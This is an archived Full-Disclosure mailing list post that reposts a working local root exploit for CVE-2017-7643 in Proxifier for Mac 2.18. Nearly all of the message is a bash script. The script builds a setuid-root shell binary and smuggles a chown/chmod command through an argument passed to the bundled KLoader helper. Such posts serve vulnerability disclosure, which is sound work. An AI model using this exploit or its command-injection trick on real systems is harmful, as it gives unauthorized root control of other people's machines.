lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <50A8F46A-CDC5-4FDD-A78D-AFE6000E4066@rkw.io> Date: Tue, 11 Apr 2017 11:24:33 +0100 From: "Mark Wadham" <fd@....io> To: fulldisclosure@...lists.org Subject: Re: [FD] CVE-2017-7643 Local root privesc in Proxifier for Mac <= 2.18 Sorry, the exploit code got mangled :S ------------------------- #!/bin/bash ##################################################################### # Local root exploit for vulnerable KLoader binary distributed with # # Proxifier for Mac v2.18 # ##################################################################### # by m4rkw # ##################################################################### cat > a.c <<EOF #include <stdio.h> #include <unistd.h> int main() { setuid(0); seteuid(0); execl("/bin/bash", "bash", NULL); return 0; } EOF gcc -o /tmp/a a.c rm -f a.c /Applications/Proxifier.app/Contents/KLoader 'blah; chown root:wheel /tmp/a ; chmod 4755 /tmp/a' /tmp/a ------------------------- _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists